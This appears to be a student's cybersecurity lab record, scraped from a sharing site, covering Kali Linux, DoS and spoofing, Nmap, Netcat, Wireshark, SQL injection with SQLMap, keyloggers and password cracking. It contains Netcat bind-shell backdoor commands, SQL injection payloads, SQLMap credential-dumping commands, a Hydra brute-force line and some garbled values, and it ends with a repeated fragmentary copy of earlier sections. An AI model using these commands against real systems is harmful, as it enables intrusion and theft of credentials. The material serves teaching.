CS 502

Prajapati Dharmesh CS (Cyber Security-3150714) 210280116502
PRACTICAL: 1
Aim: Install Kali Linux. Examine the utilities and tools available in Kali Linux
and find out which tool is best for finding cyber-attack/vulnerabilities.
• Installation of VMware Workstation.
Step 1: Download VMware Workstation from the below link.

VMware Workstation
Step 2: Double click on VMware-workstation-full-16 file to run the setup.

Step 3: Select Run.
Step 4: Preparing for install
Step 5: Welcome to the VMware Workstation wizard, click next.

Step 6: Select license agreement and then click next.
Step 7: VMware Workstation Pro Setup, click next.
Step 8: User Experience settings, so click next.

Step 9: Select the shortcuts, and then click next.
Step 10: Click on Install button to start the VMware Workstation installation.
Step 11: Installing VMware Workstation Pro.

Step 12: Click Finish.
• Installation of Kali Linux in VMware Workstation.
Step 1: Install Kali Linux from the link given below.

Install Kali Linux
Step 2: Extract file
Step 3: Move extracted file to documents > Virtual Machines folder.

Step 4: Open VMware Workstation.
Step 5: Click on “Player” on left-top. Then go to file > open.
Step 6: Go to folder Virtual Machine > Kali Linux and open .vmx file
Step 7: Virtual Machine is added. Now click on “Edit Virtual Machine” to

make necessary changes.
Step 8: Play Virtual Machine. Enter username and password as “kali”
• Tools and Utilities available in Kali Linux.
 Information gathering:
1. ace-voip
2. DotDotPwn
3. Nmap
4. Firewalk
5. dnstracer
6. Cisco-torch
7. CaseFile
 Vulnerability Analysis:
1. BED
2. BBQSQL
3. Doona
4. openvas
5. sqlmap
 Exploitation Tools:
1. Armitage
2. BeEF
3. ShellNoob
4. Commix
5. Metasploit Framework
 Wireless Attacks:
1. Airbase-ng
2. Aircrack-ng
3. Aireplay-ng
4. Airodump-ng
5. Airmon-ng
6. Fern Wi-Fi Cracker
7. Ghost Phisher
8. Kismet
 Forensics Tools
1. Cuckoo
2. p0f
3. pdf-parser
4. RegRipper
5. Dumpzilla
 Web Applications:
1. apache-users
2. fimap
3. hURL
4. PowerFuzzer
5. sqlsus
6. w3af
7. WebShag
8. WebSploit
9. WPScan
 Stress Testing:
1. t50
2. SlowHttpTest
3. FunkLoad
4. Reaver
5. rtpflood
6. mdk3
7. ipv6-toolkit
8. iaxflood
9. DHCPig
• Best tools for finding cyber attacks or Vulnerabilities:
1. Metasploit
2. Netsparker
3. Burp Suite
4. Nmap
PRACTICAL: 2
Aim: Evaluate network defense tools for IP Spoof and DOS attack.
• IP Spoofing:
Spoofing is a specific type of cyber-attack in which someone attempts to use a
computer, device, or network to trick other computer networks by masquerading as a
legitimate entity. It's one of many tools hackers use to gain access to computers to
mine them for sensitive data, turn them into zombies (computers taken over for
malicious use), or launch Denial-of-Service (DoS) attacks. Of the several types of
spoofing, IP spoofing is the most common.
IP spoofing is the creation of Internet Protocol (IP) packets which have a modified
source address in order to either hide the identity of the sender, to impersonate
another computer system, or both. It is a technique often used by bad actors to
invoke DDoS attacks against a target device or the surrounding infrastructure.
Sending and receiving IP packets is a primary way in which networked computers and
other devices communicate, and constitutes the basis of the modern internet. All IP
packets contain a header which precedes the body of the packet and contains
important routing information, including the source address. In a normal packet, the
source IP address is the address of the sender of the packet. If the packet has been
spoofed, the source address will be forged.
DDoS attacks will often utilize spoofing with a goal of overwhelming a target with
traffic while masking the identity of the malicious source, preventing mitigation
efforts. If the source IP address is falsified and continuously randomized, blocking
malicious requests becomes difficult. IP spoofing also makes it tough for law
enforcement and cyber security teams to track down the perpetrator of the attack.
Spoofing is also used to masquerade as another device so that responses are sent to
that targeted device instead. Volumetric attacks such as NTP Amplification and DNS
amplification make use of this vulnerability. The ability to modify the source IP is
inherent to the design of TCP/IP, making it an ongoing security concern.
Tangential to DDoS attacks, spoofing can also be done with the aim of masquerading
as another
device in order to sidestep authentication and gain access to or “hijack” a user’s

session.
How to protect against IP spoofing (packet filtering)
While IP spoofing can’t be prevented, measures can be taken to stop spoofed packets
from infiltrating a network. A very common defense against spoofing is ingress
filtering, outlined in BCP38 (a Best Common Practice document). Ingress filtering is
a form of packet filtering usually implemented on a network edge device which
examines incoming IP packets and looks at their source headers. If the source headers
on those packets don’t match their origin or they otherwise look fishy, the packets are
rejected. Some networks will also implement egress filtering, which looks at IP
packets exiting the network, ensuring that those packets have legitimate source
headers to prevent someone within the network from launching an outbound
malicious attack using IP spoofing.
• DOS Attack
DoS (denial of service) is a type of attack in which a threat actor sends bogus traffic
to the targeted entity. The target is unable to distinguish between the attack traffic and
legitimate traffic and ends up exhausting its resources towards attack traffic. This way
the legitimate traffic gets denied of the resources rendering the target useless.
The attackers try to make the attack sophisticated by making the requests/traffic seem
like normal traffic and making the frequency and source of traffic random.
e.g. if a website can handle 100 people/second clicking the signup button, an attacker
only has to send 100 fake requests/second to make it so no legitimate users can sign
up. This kind of attack can easily be controlled by blocking the IP etc. but when this
is launched through a lot of different sources, mostly compromised PCs, this is called
distributed denial of services or DDoS. This is tough to detect and block as the
attacking sources are distributed among the legitimate users.
This is usually launched through a lot of compromised computes called “Zombies”

and these are then used to send the requests without their knowledge. A complete
network of zombies is also called a botnet which is used to launch other kinds of
attacks as well.
Key reasons for attackers to do DDoS attack:
• Render a site useless

• Extortion/Ransom
• Revenge/hactivism
• Relatively simple to do with free tools
• Just for FUN
Categories of DDoS attacks
Volume based
The attackers send large volume of traffic/packets/requests to the target thus eating up
all the resources. The requests choke the bandwidth and cause denial to other
requests. Includes flooding attacks (ICMP and UDP).
Protocol based
Here the attacker targets the resources apart from bandwidth. The target here is
servers, firewalls, IPS, other network equipment etc. The traffic is continuously
processed leading to denial of services for legitimate requests.
Common attack types: - NTP amplification, Smurf attack, Fraggle attack, SYN
floods, Ping of death etc.
Application layer attacks
These attacks are comprised of what appears to be legitimate application layer. ( layer
7) It sends requests to the server that are intended to crash/overflow it. The attackers
can either overflow the application server with a large amount of requests or either
block the resources of the server by sending extremely slow incomplete requests thus
letting the sever wait for the complete request.
Popular dos attacking tools
INTENT -Before starting an attack check a few questions.
• Do you want to take down the website or a complete network?

• Just choke up bandwidth?
• Create MAYHEM?
• Load test a server?
• Stress test a server?
Depending on the answers to the above questions you can select a tool.
TOOL considerations
• Is the tool a standard build or the work of a script kiddie or self-written?

• What is the target of the attack tool?
• Is the Tool capable of generating multiple types of DoS attacks?
• Can you customise the traffic as per need like NO of requests/sec and protocol
selection?
• Is the tool easy to use? – Are you a command line fan or GUI lover
• Effectiveness? – Is the attack effective enough to be considered an attack or
just high traffic
• Traffic patterns and stealth techniques used? – There is no point in using a tool
if the attack traffic gets easily detected and blocked by conventional
techniques. Is the tool using fragmentation and obfuscation techniques to hide
the attack traffic?
DoS tool list
1. LOIC (Low Orbit ION cannon)

2. HOIC (High Orbit ION cannon)
3. RUDY
4. Slowloris
5. HTTP Unbearable Load King (HULK)
6. XOIC
7. DDoSIM (DDoS Simulator)
8. PyLoris
9. OWASP DoS HTTP POST
10. GoldenEye HTTP Denial of Service Tool
Prajapati Dharmesh CS(Cyber Security – 3150714) 210280116502
PRACTICAL: 3
Aim: Explore Nmap tool
Nmap means network mapper.

it is generally used for port scanning. it is one of the most important tool for
ethical hacker.
Nmap, short for Network Mapper, is a network discovery and security
auditing tool.
It is known for its simple and easy to remember flags that provide powerful
scanning options.
Nmap is widely used by network administrators to scan for:
Open ports and services

Discover services along with their versions
Guess the operating system running on a target machine
Get accurate packet routes till the target machine
Monitoring hosts
Nmap is a free and open source utility for network discovery and security
auditing.
Many systems and network administrators also find it useful for tasks such as
network inventory, managing service upgrade schedules, and monitoring host or service
uptime.
Nmap uses raw IP packets in novel ways to determine what hosts are available
on the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics.
It was designed to rapidly scan large networks, but works fine against single
hosts.
Nmap Command:
Scan a large of IP address
Port Scanning
Display Open Port
Service Version Detection
Nmap Scan Types
A variety of scans can be performed using Nmap. Below are the types of
scans:
o TCP SCAN
A TCP scan is generally used to check and complete a three-way handshake between you and
a chosen target system. A TCP scan is generally very noisy and can be detected with almost
little to no effort. This is “noisy” because the services can log the sender IP address and
might trigger Intrusion Detection Systems.
o UDP SCAN
UDP scans are used to check whether there is any UDP port up and listening for incoming
requests on the target machine. Unlike TCP, UDP has no mechanism to respond with a
positive acknowledgment, so there is always a chance for a false positive in the scan results.
However, UDP scans are used to reveal Trojan horses that might be running on UDP ports or
even reveal hidden RPC services. This type of scan tends to be quite slow because machines,
in general, tend to slow down their responses to this kind of traffic as a precautionary
measure.
o SYN SCAN
This is another form of TCP scan. The difference is unlike a normal TCP scan, nmap itself
crafts a syn packet, which is the first packet that is sent to establish a TCP connection. What
is important to note here is that the connection is never formed, rather the responses to these
specially crafted packets are analyzed by Nmap to produce scan results.
o ACK SCAN
ACK scans are used to determine whether a particular port is filtered or not. This proves to be
extremely helpful when trying to probe for firewalls and their existing set of rules. Simple
packet filtering will allow established connections (packets with the ACK bit set), whereas a
more sophisticated stateful firewall might not.
o FIN SCAN
Also a stealthy scan, like the SYN scan, but sends a TCP FIN packet instead. Most but not all
computers will send an RST packet (reset packet) back if they get this input, so the FIN scan
can show false positives and negatives, but it may get under the radar of some IDS programs
and other countermeasures.
o NULL SCAN
Null scans are extremely stealthy scan and what they do is as the name suggests — they set
all the header fields to null. Generally, this is not a valid packet and a few targets will not
know how to deal with such a packet. Such targets are generally some version of windows
and scanning them with NULL packets may end up producing unreliable results. On the other
hand, when a system is not running windows this can be used as an effective way to get
through.
o XMAS SCAN
Just like null scans, these are also stealthy in nature. Computers running windows will not
respond to Xmas scans due to the way their TCP stack is implemented. The scan derives its
name from the set of flags that are turned on within the packet that is sent out for scanning.
XMAS scans are used to manipulate the PSH, URG and FIN flags that can be found in the
TCP header.
o RPC SCAN
RPC scans are used to discover machines that respond to Remote Procedure Call services
(RPC). RPC allows commands to be run on a certain machine remotely, under a certain set of
connections. RPC service can run on an array of different ports, hence, it becomes hard to
infer from a normal scan whether RPC services are running or not. It is generally a good idea
to run an RPC scan from time to time to find out where you have these services running.
Nmap Commands
In this section of Nmap Tutorial, I’ll be listing down the various commands you can use in
Nmap along with their flag and usage description with an example on how to use it.
PRACTICAL: 4
Aim: Explore NetCat Tool.
Netcat or NC is a utility tool that uses TCP and UDP connections to read and write in a
network. It can be used for both attacking and security. In the case of attacking. It helps us
to debug the network along with investing it. It runs on all operating systems.
Getting Started with Netcat
To start NC, the most basic option we can use the help command. This will show us all the
options that we can use with Netcat. The help command is the following one: nc -h
Connecting to a Server
we can create a web server using netcat command.for that we require two device in
same network.
example:if two device are running one act as a server and another act as a client
client send connection request to server using following command:
command:nc -lv ip address port
on other device run following code to get the result
command:curl ip address:port
Chatting
Netcat can also be used to chat between two users. We need to establish a connection
before chatting. To do this we are going to need two devices. One will play the role of
initiator and one will be a listener to start the conversation and so once the connection is
established, communication can be done from both ends.First of all we will use windows 10
machine which will play role of Listener.Second we will use Kali linux machine which will
play role of initiator. First, we will have to create a listener. We will use the following
command to create a listener:
nc -lvvp 4444
where,
[-l]: Listen Mode
[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}
[p]: Local Port
ow, it’s time to create an initiator, for this we will just provide the IP Address of the System
where we started the Listener followed by the port number.
File Transfer
Netcat can be used to transfer the file across devices. Here we will create a scenario where
we will transfer a file from a windows system to Kali Linux system. To send the file from
the Windows, we will use the following command.
nc -v -w 20 -p 8888 -l file.txt
example:we create a two device called device 1 and device 2 and create a simple file called
first.txt. device 1 act as a client and device 2 act as a listener(server).then after device 1 is
connected to device 2 and then after redirect file from deivce 1 to device 2 using following
command
Command:: nc -zv 10.0.2.4 1234 > file.txt
Creating a backdoor
We can also create a backdoor using NC. To create a backdoor on the target system that we
can come back to at any time. Command for attacking a Linux System.
nc -l -p 2222 -e /bin/bash
For Creating Backdoor for windows system.
nc -l -p 1337 -e hack.exe
This will open a listener on the system that will pipe the command shell or the Linux bash
shell to the connecting system.
nc 192.168.1.35 2222
Save Output to Desktop
For the purpose of the record maintenance, better readability and future references, we will
save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save
the output in the text file.
nc 192.268.17.43 21 -v -o/root/Desktop/Result.txt
Prajapati Dharmesh CS (Cyber Security – 3150714) 210280116502
PRACTICAL-5
Aim: Use Wireshark tool and explore the packet format.
1. Select the first ICMP Echo Request message sent by your computer, and expand the
Internet Protocol part of the packet in the packet details window.
Solution :
From the above screenshot we can conclude that it is IPv4.
Source Address : 198.168.1.11
Destination Address : 142.250.183.174
2. What is the IP address of your computer?

Solution :
IP Address of my Computer is 192.168.1.11.
It can be seen in the Screenshot of Question-1 as the Source Address.

3. Within the IP packet header, what is the value in the upper layer protocol field?
Solution :
Protocol: ICMP(1)
4. How many bytes are in the IP header? How many bytes are in the payload of the IP
data-gram? Explain how you determined the number of payload bytes.
Solution :
According to above Screenshot, the header length is 20 bytes and the total length is 56 bytes.
Therefore, the payload of the IP data-gram should be 36 bytes (56 bytes – 20 bytes).
5. Has this IP data-gram been fragmented? Explain how you determined whether or not
the data-gram has been fragmented.
Solution :
Considering the above Screenshot, the red marked part, which is under flags section, Don’t
fragment bit is set to 0, so the data-gram is not fragmented.
6. What is the value in the Identification field and the TTL field?
Solution :
The identification field is: 0x533e (21310)
Time to Live: 64
7. What is the IP address and TCP/UDP port number used by your client computer
(source)?
Solution : 1. TCP
The above screenshot is of TCP in which the Source IP Address is: 192.168.1.11 and Source
Port is: 44552
2. UDP
The above screenshot is of UDP in which the Source IP Address is: 192.168.1.2 and Source
Port is: 60000
8. What is the IP address and TCP/UDP port number of destination?

Solution : 1. TCP
The above screenshot is of TCP in which the Destination IP Address is: 52.114.16.119 and
Destination Port is: 443
2. UDP
The above screenshot is of TCP in which the Destination IP Address is: 192.168.1.11 and
Destination Port is: 45516
9. Find out MAC addresses in trace.

PRACTICAL-6
Aim: Examine SQL injection attack.
• What is SQL injection (SQLi):
SQL injection is a method that gain unauthorized access of the web application database
through a malicious code. sql injection attack consists of an inserion or injection a sql
query via the input data from the client application. .
In some situations, an attacker can escalate an SQL injection attack to compromise the
underlying server or other back-end infrastructure, or perform a denial-of-service attack.
• What is impact of a successful SQL injection attack:
A successful SQL injection attack can result in unauthorized access to sensitive data, such
as passwords, credit card details, or personal user information. Many high-profile data
breaches in recent years have been the result of SQL injection attacks, leading to
reputational damage and regulatory fines. In some cases, an attacker can obtain a
persistent backdoor into an organization's systems, leading to a long-term compromise
that can go unnoticed for an extended period.
• SQL injection types:
There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which
arise in different situations. Some common SQL injection examples include:
1. Retrieving hidden data, where you can modify an SQL query to return additional
results.
2. Subverting application logic, where you can change a query to interfere with the
application's logic.
3. UNION attacks, where you can retrieve data from different database tables.
4. Examining the database, where you can extract information about the version and
structure of the database.
• Retrieving hidden data:
Consider a shopping application that displays products in different categories. When the
user clicks on the Gifts category, their browser requests the URL:
https://insecure-website.com/products?category=Gifts
This causes the application to make an SQL query to retrieve details of the relevant
products from the database:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
This SQL query asks the database to return:
• all details (*)

• from the products table • where the category is Gifts
• and released is 1.
The restriction released = 1 is being used to hide products that are not released. For
unreleased products, presumably released = 0.
The application doesn't implement any defenses against SQL injection attacks, so an
attacker can construct an attack like:
https://insecure-website.com/products?category=Gifts'--
This results in the SQL query:
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
The key thing here is that the double-dash sequence -- is a comment indicator in SQL,
and means that the rest of the query is interpreted as a comment. This effectively removes
the remainder of the query, so it no longer includes AND released = 1. This means that all
products are displayed, including unreleased products.
Going further, an attacker can cause the application to display all the products in any
category, including categories that they don't know about:
https://insecure-website.com/products?category=Gifts'+OR+1=1--
This results in the SQL query:
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
The modified query will return all items where either the category is Gifts, or 1 is equal to
1. Since 1=1 is always true, the query will return all items.
• Blind SQL injection vulnerabilities:
Many instances of SQL injection are blind vulnerabilities. This means that the application
does not return the results of the SQL query or the details of any database errors within
its responses. Blind vulnerabilities can still be exploited to access unauthorized data, but
the techniques involved are generally more complicated and difficult to perform.
Depending on the nature of the vulnerability and the database involved, the following
techniques can be used to exploit blind SQL injection vulnerabilities:
• You can change the logic of the query to trigger a detectable difference in the
application's response depending on the truth of a single condition. This might involve
injecting a new condition into some Boolean logic, or conditionally triggering an error
such as a divide-by-zero.
• You can conditionally trigger a time delay in the processing of the query, allowing you
to infer the truth of the condition based on the time that the application takes to respond.
• You can trigger an out-of-band network interaction, using OAST techniques. This
technique is extremely powerful and works in situations where the other techniques do
not. Often, you can directly exfiltrate data via the out-of-band channel, for example by
placing the data into a DNS lookup for a domain that you control.
• How to detect SQL injection vulnerabilities:
The majority of SQL injection vulnerabilities can be found quickly and reliably using Burp
Suite's web vulnerability scanner.
SQL injection can be detected manually by using a systematic set of tests against every
entry point in the application. This typically involves:
• Submitting the single quote character ' and looking for errors or other anomalies.
• Submitting some SQL-specific syntax that evaluates to the base (original) value of the
entry point, and to a different value, and looking for systematic differences in the
resulting application responses.
• Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for
differences in the application's responses.
• Submitting payloads designed to trigger time delays when executed within an SQL
query, and looking for differences in the time taken to respond.
• Submitting OAST payloads designed to trigger an out-of-band network interaction
when executed within an SQL query, and monitoring for any resulting interactions.
• How to prevent SQL injection:
Most instances of SQL injection can be prevented by using parameterized queries (also
known as prepared statements) instead of string concatenation within the query.
The following code is vulnerable to SQL injection because the user input is concatenated
directly into the query:
String query = "SELECT * FROM products WHERE category = '"+ input + "'";
Statement statement = connection.createStatement();
ResultSet resultSet = statement.executeQuery(query);
This code can be easily rewritten in a way that prevents the user input from interfering
with the query structure:
PreparedStatement statement = connection.prepareStatement("SE-

LECT * FROM products WHERE category = ?"); statement.setString(1, input);
ResultSet resultSet = statement.executeQuery();
Parameterized queries can be used for any situation where untrusted input appears as data
within the query, including the WHERE clause and values in an INSERT or UPDATE
statement. They can't be used to handle untrusted input in other parts of the query, such as
table or column names, or the ORDER BY clause. Application functionality that places
untrusted data into those parts of the query will need to take a different approach, such as
white-listing permitted input values, or using different logic to deliver the required
behavior.
For a parameterized query to be effective in preventing SQL injection, the string that is
used in the query must always be a hard-coded constant, and must never contain any
variable data from any origin. Do not be tempted to decide case-by-case whether an item
of data is trusted, and continue using string concatenation within the query for cases that
are considered safe. It is all too easy to make mistakes about the possible origin of data,
or for changes in other code to violate assumptions about what data is tainted.
• Wrapping up:
This would have got you a clear idea of what a SQL Injection is and how should we
prevent these attacks.
However, it is highly recommended to test against this type of attack every time when a
system or website with a database is being tested. Any left database or system
vulnerabilities can cost a company‘s reputation and a lot of resources to restore the whole
system.
As testing against this injection helps to find the most important security vulnerabilities, it
is also recommended to invest in your knowledge and testing tools.
If Security Testing is planned, then testing against SQL Injection should be planned as
one of the first testing parts.
PRACTICAL: 7
Aim: Perform SQL Injection with SQLMap on vulnerable website.
Vulnerable Website: http://testphp.vulnweb.com/
SQLMAP comes pre – installed with kali linux.

As you can see, there is a GET request parameter (artist = 1) that can be
changed by the user by modifying the value of cat. So, this website might be
vulnerable to SQL injection of this kind.
To test for this, we use SQLMAP. To look at the set of parameters that can be
passed, type in the terminal,
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
Here, –dbs lists all the available databases.
To try and access any of the databases, we have to slightly modify our
command. We now use -D to specify the name of the database that we wish
to access, and once we have access to the database, we would want to see
whether we can access the tables. For this, we use the –tables query.
using -D we can see the databases of the website.

following command show the database::
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart –tables

If we want to view the columns of a particular table, we can use the following
command, in which we use -T to specify the table name, and –columns to
query the column names. We will try to access the table ‘users’.
-T command is generally used to display table. in our example we saw the ta
ble name users and this table generally show the columns of the table.
Command::
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D
acuart -T users --columns
Similarly, we can access the information in a specific column by using the

following command, where -C can be used to specify multiple column name
separated by a comma, and the –dump query retrieves the data
acuart -T users -C uname --dump
In the same way for password and email,
acuart -T users -C pass --dump
acuart -T users -C email --dump
Now using credentials try to login….

Prajapati Dharmesh CS(Cyber Security-3150714) 210280116502
Practical-8
Aim: Examine software keyloggers and hardware keyloggers.
Keyloggers
 Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of
recording the keys struck on a keyboard, typically covertly, so that a person using the
keyboard is unaware that their actions are being monitored.
 Keyloggers are a particularly insidious type of spyware that can record and steal
consecutive keystrokes (and much more) that the user enters on a device.
Software based Keylogger

 It is a program that is designed to record any input entered by the user from the
keyboard. It is also used in organizations to troubleshoot some problems related to
technology.
 The keylogger is also used by the family to monitor the activities of the user without
the user’s direct knowledge.
 This is something that is installed on the hard drive. This type of software is also
called spy software.
 Now the software keylogger can also be used by parents to monitor their kids, and it
is also used for other activities. This software keylogger may be better, but it is
sometimes detectable and can also be removed by anti-spyware.
 It is used to record typed passwords, or credit card numbers, and more.
 This software keylogger has some features which enable someone to do screen
record and more.
Applications of a Software-based Keylogger:
• It is used to record keystrokes entered by the user.

• It can be used to take any snapshots of any website that the user visits.
• It can also be used by the family member to monitor activities.
• It can also be used for malicious purposes to steal any confidential information of
the user.
Detect Software-based Keylogger:
I. The user should have an anti-virus system. It should enable the user to detect any
software keylogger.
II. The user should look at all the files that have been installed. If any files look
suspicious, the user should immediately remove that file.
Prevention of the Software-based Keylogger:

I. The user should perform the two-step authentication.
II. Users should use some encryption software. This encryption software encrypts the
word typed from the keyboard.
Introduction to Hardware Keylogger

 It is a device that is used for recording the keystrokes. It starts its applications when it is
been plugged in.
 Now the information gets stored in the device. So to retrieve the data hackers/attackers
have to physically access that. Now there might be an option to retrieve the data from
the hardware keylogger remotely.
 The operation of the hardware keylogger differs from the software keylogger. There
might be a chance of the software keylogger get detected, but the hardware keylogger is
undetectable.
 The hardware keylogger is undetectable as it can appear as an external device that is
attached to the computer.
 It is not detectable by the anti-virus, and it is hard to be detectable.
 It allows the attacker to get to know the confidential details and more details from the
victim.
Hardware Keylogger key concepts

It is a physical device that is used for capturing keystrokes.
For Hardware Keylogger one must have physical access.
It can detect and can store the actual keystrokes entered by the user/victim.
Detect Hardware keylogger

I. Detection of the Hardware Keylogger is tough. It is because nobody pays attention if the
hardware keylogger has been plugged into the computer at its backside.
Prevent Hardware Keylogger

I. One should have a computer case. The computer case will prevent the access of the
hardware keylogger.
II. One should disable the extra USB ports which are not required. Only those ports will
be active which is required for use.
III. User/Victim should implement the two-factor authorization step. It will prevent the
attacker/hacker to get access to your account.
Difference between hardware keylogger and software keylogger

Hardware Keylogger:– This is a device that is used to record keystrokes. It is
attached to thecomputer, and it starts its applications when it is plugged in.
Now the information gets stored in the device. So to retrieve the data
hackers/attacker have to physically access
that. In short, we can say that the Hardware Keylogger is much tough to
detect than thesoftware keylogger.
Software Keylogger:- This is something that is installed on the hard drive. This type of software is
also called spy software. Now the software keylogger can also be used by parents to monitor their
kids, and it is also used for other activities. This software keyloggermay be better, but it is sometimes
detectable and can also be remove.
PRACTICAL-9
Aim: Perform online and offline password cracking.
⇒ What is password cracking?

• Password cracking is a process of using appilcation program to identify
an unknown or forgotten password.it can help a threat actor obtain
unauthorized access of the resource
• Password cracker can recover password using various technique.the

process can involve comparing list of words to guess password or using
an algorithm to guess a password
 Process of password Cracking:
The general process password cracker follows involves these four steps:
1. Steal a password via some nefarious means
2. Choose a cracking methodology
3. Preapare a password hashes for a cracking program.
4. run the cracking tool
 Password crackers use two primary methods to identify correct

passwords:
i. brute-force
ii. dictionary attacks.
 Different Password Cracking tools
 Cain and Abel

 HashCat
 THC Hydra
 Ophcrack
In order to implement this practical of online and offline password cracking,

we will make use of two tools:
1. THC-Hydra - For Online Password Cracking

2. Hashcat - For Offline Password Cracking Online Password Cracking Using
THC-Hydra:
• THC Hydra is a Online Password Cracking Tool
• THC Hydra is a parallezied nwtwork login cracker built in various

operating system
• Hydra work with different approach to perform bruce force attack in order
to guess the right username and password
• Hydra is a very fast and flexible
• Modules are easily add in the Hydra
• Hydra is used for research and security consultants to show how easy it
would be gain uauthorized access to a system remotely
Hydra building Command:
1. -l: Indicates a single username (use -L for a username list)

2. -P: Indicates use the following password list
3. /tmp/myPasswordList: Custom Created Password List
4. http-post-form: Indicates the type of form
5. /Login.asp: Is the login page URL
6. tfUName: Is the form field where the username is entered
7. ^USER^: Tells Hydra to use the username or list in the field
8. tfUPass: Is the form field where the password is entered (it may be passwd, pass,
etc).
9. ^PASS^: Tells Hydra to use the password list supplied ⚫ ‘Invalid login!’: Is the login
failure message that the form returned
Final command will look like:
hydra -l test -P /tmp/myPasswordList.txt testasp.vulnweb.com http-post-form

"/Login.asp:tfUName=^USER^&tfUPass=^PASS^:Invalid login!"
HashCat:
⇒ HashCat is generally used in offline password cracking
⇒ HashCat is a particularly fast, efficient and versatile hacking tool

that assist bruce force attack by conducting them with hash values
of password that the tool is guess
⇒ HashCat has Two Variants. CPU and GPU based

GPU based tool can crack a password less than time as compare
to CPU
⇒ HashCat is a Popular Password Cracker and even design to break even

most complex password representation
⇒ Password representation are primarily associated with hash keys, such as a

MD5, SHA, Ripe MD
⇒ Hash Cat Help Command:
 Hash cat --run in the terminal

PRACTICAL-10
Aim: Consider a case study of cyber crime, where the attacker has
performed on line credit card fraud. Prepare a report and also list the laws
that will be implemented on attacker.
.
⇒ What is Cyber Crime?

• Cyber Crime is a Criminal activity that either a target or Computer
or Computer network.
• The motive of cybercriminal is to making money or Hacker is a passion

of some criminal or working for someone.
• Cyber Crime is involved Different type of Crime like online Credit

Card Fraud, Fishing, and Money Transferring.
• Most Cyber Crime Committed by the Attacker or Hacker Who Want

toMake Money.
 Ways to chance of stolen credit card information:
1. Phishing:
 Problem
• With a Phishing attack Hacker Attempt to Steal Valuable information by

impersonating a trust source.
• For Example: Someone pretending to be from your issuing bank or credit

card company calls and says they need to verify your credit card activity
with some personal information and start off by asking your credit card
number
 Solution
• The best Way to prevent Phishing scam--whatever via email,

phoneor text -- is never give up any personal information unless
you initiated a contact. Also, go directly to the retailer’s website to
conduct business to ensure you control all transaction.
2. Malware and Spyware:
 Problem
• Accidently downloading spyware or malware enable hacker

accessthe information stored in your computer including credit
card information and other details.
• malware may include key-logger the store keystroke or

browserhistory and then send information to the hacker
 Solution
• Do not install unknown software
• Do not download the attachment
• Avoid Downloading Copyright Files
3. Skimming
 Problem
• Credit card skimming is a most popular offline method used by
criminals to steal personal information, which can also lead to
identity theft, at a point of sale.
 Solution
• Inspect outdoor credit card readers for sign they may have been
tampered with before using them.
 Laws that implement on attacker:

⇒ All this laws comes under the IT act:
• Section 43: this section of the IT act applies to individuals who

indulge in cyber crimes such as damaging the computer of the victim,
without taking the due permission of the victim.
• Section 66: applies to any conduct described in section 43 that is

dishonest. there can be to three years of imprisonment in such
instances
• Section 66b: this section describes the penalties for fraud receiving
stolen communication devices or computers and confirms a
possible three-year prison sentence.

CS 502

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CS 502

Uploaded by

Copyright:

Available Formats

Prajapati Dharmesh CS (Cyber Security-3150714) 210280116502

• Installation of VMware Workstation.

Step 1: Download VMware Workstation from the below link.

Step 2: Double click on VMware-workstation-full-16 file to run the setup.

Step 3: Select Run.

Step 4: Preparing for install

Step 5: Welcome to the VMware Workstation wizard, click next.

Step 6: Select license agreement and then click next.

Step 7: VMware Workstation Pro Setup, click next.

Step 8: User Experience settings, so click next.

Step 9: Select the shortcuts, and then click next.

Step 11: Installing VMware Workstation Pro.

Step 12: Click Finish.

• Installation of Kali Linux in VMware Workstation.

Step 1: Install Kali Linux from the link given below.

Step 3: Move extracted file to documents > Virtual Machines folder.

Step 4: Open VMware Workstation.

Step 5: Click on “Player” on left-top. Then go to file > open.

Step 7: Virtual Machine is added. Now click on “Edit Virtual Machine” to

Step 8: Play Virtual Machine. Enter username and password as “kali”

• Tools and Utilities available in Kali Linux.

device in order to sidestep authentication and gain access to or “hijack” a user’s

How to protect against IP spoofing (packet filtering)

This is usually launched through a lot of compromised computes called “Zombies”

Key reasons for attackers to do DDoS attack:

• Render a site useless

Categories of DDoS attacks

Application layer attacks

Popular dos attacking tools

INTENT -Before starting an attack check a few questions.

• Do you want to take down the website or a complete network?

• Is the tool a standard build or the work of a script kiddie or self-written?

DoS tool list

1. LOIC (Low Orbit ION cannon)

Aim: Explore Nmap tool

Nmap means network mapper.

Open ports and services

Aim: Explore NetCat Tool.

Getting Started with Netcat

command:nc -lv ip address port

on other device run following code to get the result

Save Output to Desktop

Aim: Use Wireshark tool and explore the packet format.

From the above screenshot we can conclude that it is IPv4.

Source Address : 198.168.1.11

Destination Address : 142.250.183.174

2. What is the IP address of your computer?

IP Address of my Computer is 192.168.1.11.

It can be seen in the Screenshot of Question-1 as the Source Address.

The identification field is: 0x533e (21310)

8. What is the IP address and TCP/UDP port number of destination?

9. Find out MAC addresses in trace.

Aim: Examine SQL injection attack.

• What is SQL injection (SQLi):

• What is impact of a successful SQL injection attack:

• SQL injection types:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

This SQL query asks the database to return:

• all details (*)

This results in the SQL query:

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

This results in the SQL query:

SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1